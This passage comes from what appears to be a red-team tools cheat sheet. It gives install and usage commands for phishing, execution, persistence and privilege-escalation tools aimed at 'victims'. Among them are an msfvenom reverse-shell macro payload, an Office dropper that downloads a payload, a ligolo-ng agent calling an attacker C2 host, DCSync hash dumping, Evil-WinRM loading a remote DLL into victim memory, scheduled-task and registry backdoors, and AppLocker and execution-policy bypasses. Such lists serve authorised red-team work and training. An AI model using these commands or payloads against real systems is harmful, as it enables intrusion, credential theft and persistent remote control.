ssh\n```\n\n![image](https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png)\n\n### [πŸ”™](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish)\n\nSquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See [PhishInSuits](https://github.com/secureworks/PhishInSuits) for more about OAuth Device Code flow for phishing attacks).\n\nAttack Steps:\n\n- Send malicious QR code to victim\n- Victim scans QR code with mobile device\n- Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)\n- Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)\n- Attacker polls for authentication\n- Victim enters code into legit Microsoft website\n- Attacker saves authentication token\n\n**Install:** \n\n```bash\ngit clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt\n```\n\n**Note:** *Before using either module, update the required information in the settings.config file noted with `Required`.*\n\n**Usage (Email Module):**\n\n```\nusage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n\n -e EMAIL, --email EMAIL\n victim email address to send initial QR code email to\n```\n\n**Usage (Server Module):**\n\n```\nusage: squish.py server [-h] [-c CONFIG] [--debug]\n\noptional arguments:\n -h, --help show this help message and exit\n\n -c CONFIG, --config CONFIG\n squarephish config file [Default: settings.config]\n\n --debug enable server debugging\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png)\n \n\n### [πŸ”™](#tool-list)[King Phisher](https://github.com/securestate/king-phisher)\n\nKing Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.\n\nIt includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.\n\n**Install (Linux - Client \u0026 Server):** \n\n```bash\nwget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh \u0026\u0026 \\\nsudo bash ./install.sh\n```\n\n**Usage:**\n\nOnce King Phisher has been installed please follow the [wiki page](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) to setup SSH, Database config, SMTP server etc.\n\n![image](https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png)\n\nExecution\n====================\n\n### [πŸ”™](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)\n\nResponder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution.\n\nThe LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network. \n\nResponder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker.\n\n**Install:** \n\n```bash\ngit clone https://github.com/SpiderLabs/Responder#usage\ncd Responder\n```\n\n**Usage:** \n\n```bash\n# Running the tool\n./Responder.py [options]\n\n# Typical usage\n./Responder.py -I eth0 -wrf\n```\n\nFull usage information can be found [here](https://github.com/SpiderLabs/Responder#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png)\n\n*Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/*\n\n### [πŸ”™](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)\n\nA utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system. \n\nIt does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as:\n\n- Password hashes for local accounts\n- Kerberos tickets and keys\n- LSA Secrets\n\n**Install:** \n\n```bash\npython3 -m pip install impacket\n```\n\n**Usage:** \n\n```bash\n# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# DCSync attack and dump the NTLM hashes of all domain users.\nsecretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:Sheffield19@10.10.10.30\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png)\n\n*Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy*\n\n### [πŸ”™](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)\n\nEvil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: *A service that allows administrators to remotely execute commands on a Windows machine*).\n\nEvil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.\n\nSome features include:\n\n- Loading in memory Powershell scripts\n- Loading in memory dll files bypassing some AVs\n- Loading x64 payloads\n- Pass-the-hash support\n- Uploading and downloading local and remote files\n\n\n**Install: (Git)** \n\n```bash\nsudo gem install winrm winrm-fs stringio logger fileutils\ngit clone https://github.com/Hackplayers/evil-winrm.git\ncd evil-winrm\n```\n\n**Install: (Ruby gem)** \n\n```bash\ngem install evil-winrm\n```\n\nAlternative installation instructions can be found [here](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).\n\n**Usage:** \n\n```bash\n# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations\nevil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'\n\n# Upload local files to victim\nupload local_filename\nupload local_filename destination_filename\n\n# Download remote files to local machine\ndownload remote_filename\ndownload remote_filename destination_filename\n\n# Execute .Net assembly into victim memory\nInvoke-Binary /opt/csharp/Rubeus.exe\n\n# Load DLL library into victim memory\nDll-Loader -http http://10.10.10.10/SharpSploit.dll\n```\n\nFull usage documentation can be found [here](https://github.com/Hackplayers/evil-winrm#documentation).\n\n![image](https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png)\n\n*Image used from https://korbinian-spielvogel.de/posts/heist-writeup/*\n\n### [πŸ”™](#tool-list)[Donut](https://github.com/TheWover/donut/)\n\nA tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk.\n\n**Install: (Windows)** \n\n```bash\ngit clone http://github.com/thewover/donut.git\n```\n\nTo generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:\n\n```bash\nnmake -f Makefile.msvc\n```\n\nTo do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:\n\n```bash\nmake -f Makefile.mingw\n```\n\n**Install: (Linux)** \n\n```bash\npip3 install donut-shellcode\n```\n\n**Usage:** \n\n```bash\n# Creating shellcode from an XSL file that pops up a calculator.\nshellcode = donut.create(file=r\"C:\\\\Tools\\\\Source\\\\Repos\\\\donut\\\\calc.xsl\")\n\n# Creating shellcode from an unmanaged DLL. Invokes DLLMain.\nshellcode = donut.create(file=r\"C:\\Tools\\Source\\Repos\\donut\\payload\\test\\hello.dll\")\n```\n\nFor full usage information, see the donut [GitHub Page](https://github.com/TheWover/donut/#4-usage).\n\nSee [a recent blog post](https://thewover.github.io/Bear-Claw/) from The Wover for more info.\n\n![image](https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png)\n\n### [πŸ”™](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)\n\nA tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming.\n\n**Install: (Binary)** \n\n1. Get the latest binary from [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)\n2. Download binary on PC with genuine Microsoft Office installed.\n3. Open console, CD to binary dir and call the binary\n\n**Install: (Git)** \n\n```bash\ngit clone https://github.com/sevagas/macro_pack.git\ncd macro_pack\npip3 install -r requirements.txt\n```\n\n**Usage:** \n\n```bash\n# Help Page\npython3 macro_pack.py --help\n\n# List all supported file formats\nmacro_pack.exe --listformats\n# Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba\n\n# Obfuscate Empire stager VBA file and generate a MS Word document:\nmacro_pack.exe -f empire.vba -o -G myDoc.docm\n\n# Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)\necho \"https://myurl.url/payload.exe\" \"dropped.exe\" | macro_pack.exe -o -t DROPPER -G \"drop.xlsm\" \n\n# Execute calc.exe via Dynamic Data Exchange (DDE) attack\necho calc.exe | macro_pack.exe --dde -G calc.xslx\n```\n\n![image](https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png)\n\n### [πŸ”™](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)\n\nA collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives.\n\nSome of the features of PowerSploit:\n\n- Dump password hashes and extract clear-text passwords from memory\n- Escalate privileges and bypass security controls\n- Execute arbitrary PowerShell code and bypass execution restrictions\n- Perform network reconnaissance and discovery\n- Generate payloads and execute exploits\n\n**Install:** *1. Save to PowerShell modules folder*\n\nFirst you will need to download the [PowerSploit Folder](https://github.com/PowerShellMafia/PowerSploit) and save it to your PowerShell modules folder.\n\nYour PowerShell modules folder path can be found with the following command:\n\n```\n$Env:PSModulePath\n```\n\n**Install:** *2. Install PowerSploit as a PowerShell module*\n\nYou will then need to install the PowerSploit module (use the name of the downloaded folder). \n\n**Note:** *Your PowerShell execution policy might block you, to fix this run the following command.*\n\n```\npowershell.exe -ep bypass\n```\n\nNow you can install the PowerSploit module.\n\n```\nImport-Module PowerSploit\n```\n\n**Usage:** \n\n```\nGet-Command -Module PowerSploit\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png)\n\n### [πŸ”™](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)\n\nA tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties.\n\nSome of the features of Rubeus:\n\n- Kerberoasting\n- Golden ticket attacks\n- Silver ticket attacks\n\n**Install: (Download)** \n\nYou can install the unofficial pre-compiled Rubeus binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe). \n\n**Install: (Compile)** \n\nRubeus is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the rubeus [project .sln](https://github.com/GhostPack/Rubeus), choose \"Release\", and build.\n\n**Usage:** \n\n```\nRubeus.exe -h\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208250015-674a6fee-95b7-4edf-bd59-fe459cd235ed.png)\n\n\n### [πŸ”™](#tool-list)[SharpUp](https://github.com/GhostPack/SharpUp)\n\nA nice tool for checking a victims endpoint for vulnerabilites relating to high integrity processes, groups, hijackable paths, etc.\n\n**Install: (Download)** \n\nYou can install the unofficial pre-compiled SharpUp binary [here](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/SharpUp.exe). \n\n**Install: (Compile)** \n\nSharpUp is compatible with [Visual Studio 2015 Community Edition](https://go.microsoft.com/fwlink/?LinkId=532606\u0026clcid=0x409). Open the SharpUp [project .sln](https://github.com/GhostPack/SharpUp), choose \"Release\", and build.\n\n**Usage:** \n\n```bash\nSharpUp.exe audit\n#-\u003e Runs all vulnerability checks regardless of integrity level or group membership.\n\nSharpUp.exe HijackablePaths\n#-\u003e Check only if there are modifiable paths in the user's %PATH% variable.\n\nSharpUp.exe audit HijackablePaths\n#-\u003e Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.\n```\n\n![image](https://user-images.githubusercontent.com/100603074/210079939-e709cced-04a2-44a5-9da0-f387bc6599b1.png)\n\n### [πŸ”™](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)\n\nMS-SQL (Microsoft SQL Server) is a relational database management system developed and marketed by Microsoft.\n\nThis C# MS-SQL toolkit is designed for offensive reconnaissance and post-exploitation. For detailed usage information on each technique, refer to the [wiki](https://github.com/skahwah/SQLRecon/wiki).\n\n**Install: (Binary)** \n\nYou can download the latest binary release from [here](https://github.com/skahwah/SQLRecon/releases).\n\n**Usage:** \n\n```bash\n# Authenticating using Windows credentials\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# Authenticating using Local credentials\nSQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami\n\n# Authenticating using Azure AD credentials\nSQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami\n\n# Run whoami\nSQLRecon.exe -a Windows -s SQL01 -d master -m whoami\n\n# View databases\nSQLRecon.exe -a Windows -s SQL01 -d master -m databases\n\n# View tables\nSQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019\n```\n\nFull usage information can be found on the [wiki](https://github.com/skahwah/SQLRecon/wiki).\n\nTool module usage information can be found [here](https://github.com/skahwah/SQLRecon#usage).\n\n![image](https://user-images.githubusercontent.com/100603074/211530318-6e115272-a00c-4e9e-af9a-852d476ff3fb.png)\n\n*Image used from SQLRecon help page*\n\n### [πŸ”™](#tool-list)[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList)\n\nThis resrouce is a collection of the most common and known techniques to bypass AppLocker. \n\nSince AppLocker can be configured in different ways [@api0cradle](https://github.com/api0cradle) maintains a verified list of bypasses (that works against the default AppLocker rules) and a list with possible bypass technique (depending on configuration) or claimed to be a bypass by someone. \n\nThey also have a list of generic bypass techniques as well as a legacy list of methods to execute through DLLs.\n\nIndexed Lists\n\n- [Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)\n- [VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md)\n- [UnverifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/UnverifiedAppLockerBypasses.md)\n- [DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)\n\n![image](https://user-images.githubusercontent.com/100603074/217654010-5fa1102b-7463-4389-bd73-48a6b8a752bc.png)\n\n*Image used from https://github.com/api0cradle/UltimateAppLockerByPassList*\n\n### [πŸ”™](#tool-list)[StarFighters](https://github.com/Cn33liz/StarFighters)\n\nA JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.\n\nBoth Launchers run within their own embedded PowerShell Host, so we don't need PowerShell.exe. \n\nThis might be usefull when a company is blocking PowerShell.exe and/or is using a Application Whitelisting solution, but does not block running JS/VBS files.\n\n**Usage:** \n\n- Setup a new Listener within PowerShell Empire\n- Use the Launcher command to Generate a PowerShell launcher for this listener\n- Copy and Replace the Base64 encoded Launcher Payload within the StarFighter JavaScript or VBScript file\n\nFor the JavaScript version use the following Variable: \n\n```javascript\n var EncodedPayload = \"\u003cPaste Encoded Launcher Payload Here\u003e\"\n```\n\nFor the VBScript version use the following Variable: \n\n```vbscript\n Dim EncodedPayload: EncodedPayload = \"\u003cPaste Encoded Launcher Payload Here\u003e\"\n```\n\n- Then run: wscript.exe StarFighter.js or StarFighter.vbs on Target, or DoubleClick the launchers within Explorer.\n\n![image](https://user-images.githubusercontent.com/100603074/217654090-d8f57773-4fa0-44dd-b5b1-ad4b66f7c98e.png)\n\n*Image used from https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html*\n\n### [πŸ”™](#tool-list)[demiguise](https://github.com/nccgroup/demiguise)\n\nThe aim of this project is to generate .html files that contain an encrypted HTA file. \n\nThe idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. \n\nThis is an evasion technique to get round content / file-type inspection implemented by some security-appliances.\n\nFurther technical information [here](https://github.com/nccgroup/demiguise#how-does-it-do-it). \n\n**Install:** \n\n```\ngit clone https://github.com/nccgroup/demiguise\ncd demiguise\n```\n\n**Usage:** \n\n```bash\n# Generate an encrypted .hta file that executes notepad.exe\npython demiguise.py -k hello -c \"notepad.exe\" -p Outlook.Application -o test.hta\n```\n\n![image](https://user-images.githubusercontent.com/100603074/217654229-fb3a4875-2de2-4bc3-9583-8300e014fda4.png)\n\n*Image used from https://github.com/nccgroup/demiguise*\n\n## [πŸ”™](#tool-list)[PowerZure](https://github.com/hausec/PowerZure)\n\nPowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.\n\nThere is zero reason to ever run PowerZure on a victim’s machine. Authentication is done by using an existing accesstoken.json file or by logging in via prompt when logging into Azure, meaning you can safely use PowerZure to interact with a victim’s cloud instance from your operating machine.\n\n**Install:** \n\n```bash\nInstall-Module -Name Az\ngit clone https://github.com/hausec/PowerZure\ncd PowerZure\nipmo C:\\path\\to\\PowerZure.psd1\n```\n\n**Usage:** \n\n```bash\n# Get a list of AzureAD and Azure objects you have access to\nGet-AzureTarget\n```\n\n[Blog - Attacking Azure, Azure AD, and Introducing PowerZure](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)\n\n![image](https://user-images.githubusercontent.com/100603074/229649681-a1d83b3c-b595-417b-8d77-c3ba90da203f.png)\n\n*Image used from https://hakin9.org*\n\n\nPersistence\n====================\n\n### [πŸ”™](#tool-list)[Impacket](https://github.com/fortra/impacket)\n\nImpacket provides a set of low-level Python bindings for various network protocols, including SMB, Kerberos, and LDAP, as well as higher-level libraries for interacting with network services and performing specific tasks such as dumping password hashes and creating network shares.\n\nIt also includes a number of command-line tools that can be used to perform various tasks such as dumping SAM databases, enumerating domain trusts, and cracking Windows passwords.\n\n**Install:** \n\n```bash\npython3 -m pip install impacket\n```\n\n**Install: (With Example Scripts)** \n\nDownload and extract [the package](https://github.com/fortra/impacket), then navigate to the install folder and run...\n\n```bash\npython3 -m pip install .\n```\n\n**Usage:** \n\n```bash\n# Extract NTLM hashes with local files\nsecretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL\n\n# Gets a list of the sessions opened at the remote hosts\nnetview.py domain/user:password -target 192.168.10.2\n\n# Retrieves the MSSQL instances names from the target host.\nmssqlinstance.py 192.168.1.2\n\n# This script will gather data about the domain's users and their corresponding email addresses.\nGetADUsers.py domain/user:password@IP\n```\n\nGreat [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) for Impacket usage.\n\n![image](https://user-images.githubusercontent.com/100603074/210079475-a13f7fe2-7801-40dd-977b-e179d0658b47.png)\n\n### [πŸ”™](#tool-list)[Empire](https://github.com/EmpireProject/Empire)\n\nEmpire is a post-exploitation framework that allows you to generate payloads for establishing remote connections with victim systems.\n\nOnce a payload has been executed on a victim system, it establishes a connection back to the Empire server, which can then be used to issue commands and control the target system.\n\nEmpire also includes a number of built-in modules and scripts that can be used to perform specific tasks, such as dumping password hashes, accessing the Windows registry, and exfiltrating data.\n\n**Install:** \n\n```bash\ngit clone https://github.com/EmpireProject/Empire\ncd Empire\nsudo ./setup/install.sh\n```\n\n**Usage:** \n\n```bash\n# Start Empire\n./empire\n\n# List live agents\nlist agents\n\n# List live listeners\nlist listeners\n```\n\nNice usage [cheat sheet](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf) by [HarmJoy](https://github.com/HarmJ0y).\n\n![image](https://user-images.githubusercontent.com/100603074/210080911-b3c7572a-a0dd-4664-a3e1-46b343db8a79.png)\n\n### [πŸ”™](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)\n\nA Windows persistence toolkit written in C#.\n\nThe project has a [wiki](https://github.com/mandiant/SharPersist/wiki).\n\n**Install: (Binary)** \n\nYou can find the most recent release [here](https://github.com/mandiant/SharPersist/releases).\n\n**Install: (Compile)** \n\n- Download the project files from the [GitHub Repo](https://github.com/mandiant/SharPersist).\n- Load the Visual Studio project up and go to \"Tools\" --\u003e \"NuGet Package Manager\" --\u003e \"Package Manager Settings\"\n- Go to \"NuGet Package Manager\" --\u003e \"Package Sources\"\n- Add a package source with the URL \"https://api.nuget.org/v3/index.json\"\n- Install the Costura.Fody NuGet package. The older version of Costura.Fody (3.3.3) is needed, so that you do not need Visual Studio 2019.\n\t- `Install-Package Costura.Fody -Version 3.3.3`\n- Install the TaskScheduler package\n\t- `Install-Package TaskScheduler -Version 2.8.11`\n- You can now build the project yourself!\n\n**Usage:**\n\nA full list of usage examples can be found [here](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).\n\n```\n#KeePass\nSharPersist -t keepass -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"C:\\Users\\username\\AppData\\Roaming\\KeePass\\KeePass.config.xml\" -m add \n\n#Registry\nSharPersist -t reg -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -k \"hkcurun\" -v \"Test Stuff\" -m add\n\n#Scheduled Task Backdoor\nSharPersist -t schtaskbackdoor -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -n \"Something Cool\" -m add\n\n#Startup Folder\nSharPersist -t startupfolder -c \"C:\\Windows\\System32\\cmd.exe\" -a \"/c calc.exe\" -f \"Some File\" -m add\n```\n\n![image](https://user-images.githubusercontent.com/100603074/208880117-3ce7eefc-9e0b-477d-ada4-b3867909ff38.png)\n\n### [πŸ”™](#tool-list)[ligolo-ng](https://github.com/nicocha30/ligolo-ng)\n\nLigolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).\n\nInstead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using [Gvisor](https://gvisor.dev/).\n\nWhen running the relay/proxy server, a tun interface is used, packets sent to this interface are translated, and then transmitted to the agent remote network.\n\n**Install: (Download)** \n\nPrecompiled binaries (Windows/Linux/macOS) are available on the [Release page](https://github.com/nicocha30/ligolo-ng/releases).\n\n**Install: (Build)** \n\n*Building ligolo-ng (Go \u003e= 1.17 is required):*\n\n```bash\ngo build -o agent cmd/agent/main.go\ngo build -o proxy cmd/proxy/main.go\n\n# Build for Windows\nGOOS=windows go build -o agent.exe cmd/agent/main.go\nGOOS=windows go build -o proxy.exe cmd/proxy/main.go\n```\n\n**Setup: (Linux)** \n\n```bash\nsudo ip tuntap add user [your_username] mode tun ligolo\nsudo ip link set ligolo up\n```\n\n**Setup: (Windows)** \n\nYou need to download the [Wintun](https://www.wintun.net/) driver (used by [WireGuard](https://www.wireguard.com/)) and place the `wintun.dll` in the same folder as Ligolo (make sure you use the right architecture).\n\n**Setup: (Proxy server)** \n\n```bash\n./proxy -h # Help options\n./proxy -autocert # Automatically request LetsEncrypt certificates\n```\n\n**Usage:**\n\n*Start the agent on your target (victim) computer (no privileges are required!):*\n\n```bash\n./agent -connect attacker_c2_server.com:11601\n```\n\nA session should appear on the proxy server.\n\n```\nINFO[0102] Agent joined. name=nchatelain@nworkstation remote=\"XX.XX.XX.XX:38000\"\n```\n\nUse the session command to select the agent.\n\n```\nligolo-ng Β» session \n? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000\n```\n\nFull usage information can be found [here](https://github.com/nicocha30/ligolo-ng#using-ligolo-ng).\n\n![image](https://user-images.githubusercontent.com/100603074/216729440-80871cad-4c06-4eb5-8e91-d083ea3f1d2b.png)\n\n*Image used from https://github.com/nicocha30/ligolo-ng#demo*\n\nPrivilege Escalation\n====================\n\n### [πŸ”™](#tool-list)[Crassus](https://github.com/vu-ls/Crassus)\n\n\"Accenture made a tool called Spartacus, which finds DLL hijacking opportunities on Windows. Using Spartacus as a starting point, we created Crassus to extend Windows privilege escalation finding capabilities beyond simply looking for missing files. The ACLs used by files and directories of privileged processes can find more than just looking for missing files to achieve the goal.\" - [Link](https://github.com/vu-ls/Crassus?tab=readme-ov-file#why-crassus)\n\n**Install: (Build)** \n\nCrassus was developed as a Visual Studio 2019 project. To build Crassus.exe:\n\n1. Open Crassus.sln\n2. Press Ctrl+Shift+B on your keyboard\n\n**Install: (precompiled)** \n\nIf you trust running other people's code without knowing what it does, Crassus.exe is [provided in this repository](https://github.com/vu-ls/Crassus/blob/main/binaries/Crassus.exe).\n\n**Usage:** \n\n1. In [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon), select the `Enable Boot Logging` option. \n2. Reboot.\n3. Once you have logged in and Windows has settled, optionally also run [scheduled tasks that may be configured to run with privileges](https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c).\n4. Run Process Monitor once again.\n5. When prompted, save the boot log.\n6. Reset the default Process Monitor filter using `Ctrl-R`.\n7. Save this log file, e.g., to `boot.PML`. The reason for re-saving the log file is twofold:\n 1. Older versions of Process Monitor do not save boot logs as a single file.\n 2. Boot logs by default will be unfiltered, which may contain extra noise, such as a local-user DLL hijacking in the launching of of Process Monitor itself.\n\n![Crassus](https://github.com/user-attachments/assets/0194b7bf-80ee-44cd-a576-22bc6888de8a)\n\n*Image used from https://github.com/vu-ls/Crassus?tab=readme-ov-file#screenshots*\n\n### [πŸ”™](#tool-list)[LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)\n\nLinPEAS is a nice verbose privilege escalation for finding local privesc routes on Linux endpoints. \n\n**Install + Usage:**\n\n```bash\ncurl -L \"https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh\" | sh\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070104-8a121544-5c88-4c24-8b2e-590700b345e7.png)\n\n### [πŸ”™](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)\n\nWinPEAS is a nice verbose privilege escalation for finding local privesc routes on Windows endpoints. \n\n**Install + Usage:** \n\n```bash\n$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest \"https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe\" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main(\"\")\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070193-fed8a0e8-b82a-4338-9209-6352f33ab6b8.png)\n\n### [πŸ”™](#tool-list)[linux-smart-enumeration](https://github.com/diego-treitos/linux-smart-enumeration)\n\nLinux smart enumeration is another good, less verbose, linux privesc tool for Linux.\n\n**Install + Usage:** \n\n```bash\ncurl \"https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh\" -Lo lse.sh;chmod 700 lse.sh\n```\n\n![image](https://user-images.githubusercontent.com/100603074/192070258-2fe8727a-4b75-430d-a84e-da6605750de9.png)\n\n### [πŸ”™](#tool-list)[Certify](https://github.com/GhostPack/Certify)\n\nCertify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS).\n\nCertify is designed to be used in conjunction with other red team tools and techniques, such as Mimikatz and PowerShell, to enable red teamers to perform various types of attacks, including man-in-the-middle attacks, impersonation attacks, and privilege escalation attacks.\n\n**Key features of Certify:**\n \n- Certificate creation\n- Certificate signing\n- Certificate import\n- Certificate trust modification\n\n**Install: (Compile)** \n\nCertify is compatible with [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). Open the Certify project [.sln](https://github.com/GhostPack/Certify), choose \"Release\", and build.\n\n**Install: (Running Certify Through PowerShell)** \n\nIf you want to run Certify in-memory through a PowerShell wrapper, first compile the Certify and base64-encode the resulting assembly:\n\n```bash\n[Convert]::ToBase64String([IO.File]::ReadAllBytes(\"C:\\Temp\\Certify.exe\")) | Out-File -Encoding ASCII C:\\Temp\\Certify.txt\n```\n\nCertify can then be loaded in a PowerShell script with the following (where \"aa...\" is replaced with the base64-encoded Certify assembly string):\n\n```\n$CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String(\"aa...\"))\n```\n\nThe Main() method and any arguments can then be invoked as follows:\n\n```\n[Certify.Program]::Main(\"find /vulnerable\".Split())\n```\n\nFull compile instructions can be found [here](https://github.com/GhostPack/Certify#compile-instructions).\n\n**Usage:** \n\n```bash\n# See if there are any vulnerable templates\nCertify.exe find /vulnerable\n\n# Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal\nCertify.exe request /ca:dc.theshire.local\\theshire-DC-CA /template:VulnTemplate /altname:localadmin\n```\n\nFull example walkthrough can be found [here](https://github.com/GhostPack/Certify#example-walkthrough).\n\n![image](https://user-images.githubusercontent.com/100603074/210088651-28899ba5-cbbd-4b03-8000-068fd401476d.png)\n\n### [πŸ”™](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)\n\nGet-GPPPassword is a PowerShell script part of the PowerSploit toolkit, it is designed to retrieve passwords for local accounts that are created and managed using Group Policy Preferences (GPP).\n\nGet-GPPPassword works by searching the SYSVOL folder on the domain controller for any GPP files that contain password information. Once it finds these files, it decrypts the password information and displays it to the user.\n\n**Install:** \n\nFollow the PowerSploit [installation instructions](https://github.com/A-poc/RedTeam-Tools#powersploit) from this tool sheet.\n\n```bash\npowershell.exe -ep bypass\nImport-Module PowerSploit\n```\n\n**Usage:** \n\n```bash\n# Get all passwords with additional information\nGet-GPPPassword\n\n# Get list of all 